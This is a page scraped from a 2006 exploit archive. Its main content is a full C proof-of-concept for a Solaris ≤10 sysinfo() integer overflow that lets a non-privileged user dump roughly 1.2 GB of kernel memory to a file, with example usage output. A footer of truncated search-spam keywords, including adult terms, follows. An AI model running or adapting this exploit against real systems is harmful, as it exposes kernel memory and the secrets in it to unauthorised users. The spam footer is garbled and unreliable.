about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit




2006-07-24 Solaris <= 10 sysinfo() Local Kernel Memory Disclosure Exploit
Rated as : Critical

/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
 * ===================================================================
 * Local exploitation of an integer overflow vulnerability in Sun
 * Microsystems Inc. Solaris allows attackers to read kernel memory from
a
 * non-privileged userspace process. The vulnerability specifically
exists
 * due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
 *
 * Example Use.
 * $ uname -a 
 * SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
 * $ ./prdelka-vs-SUN-sysinfo kbuf
 * [ Solaris <= 10 sysinfo() kernel memory information leak
 * [ Wrote 1294967293 bytes to kbuf
 * $ ls -al kbuf
 * -rwx------   1 user     other       1.2G Jul 21 23:56 kbuf
 *
 * -prdelka
 */
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define bufsize 1294967293

int main(int argc,char* argv[]){
        int fd;
 	ssize_t out;
        char* output_buffer;
	if(argc < 2){
		printf("[ Use with <filepath>\n");
		exit(1);
	}
        printf("[ Solaris <= 10 sysinfo() kernel memory
information leak\n");
	output_buffer = malloc(bufsize);
        memset(output_buffer,0,bufsize);
        sysinfo(SI_SYSNAME,output_buffer,0);
        fd = open(argv[1],O_RDWR|O_CREAT,0700);
	if(fd!=-1){
	        out = write(fd,output_buffer,bufsize);
		printf("[ Wrote %u bytes to %s\n",out,argv[1]);
	        close(fd);
	}
        exit(0);
}
securitydot.net - 2006-07-24

Advertising

Copyright 2007, SecurityDot
Mon, 30 Nov 2009 02:08:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sxygir www.98qy.c Fete goale ghostsurf www.kyjbj. microsoft girls squi SSH 2.0 Op php r57 Gunz rocke news for c sex googl Apache htt www. tamil free porn. news for c Sarah ajda news for c Www.102030 Netopia ONLY for Www.te www.taoke1 Der Herr d www.mmm100 www.wqxhzj zhidao.hx2 FreeBSD [2 www.hotgir CHAINASEX PHPRaider ????? ?? ? cisco 11.2 Artis.indo Crack Data Sarah asar Sexetv PHPRaider www.lnwlc. namitasexy black sex Www.teenpi chmod expl couch cand vedu sex www.office index.php? pinkward . news for c Saximovie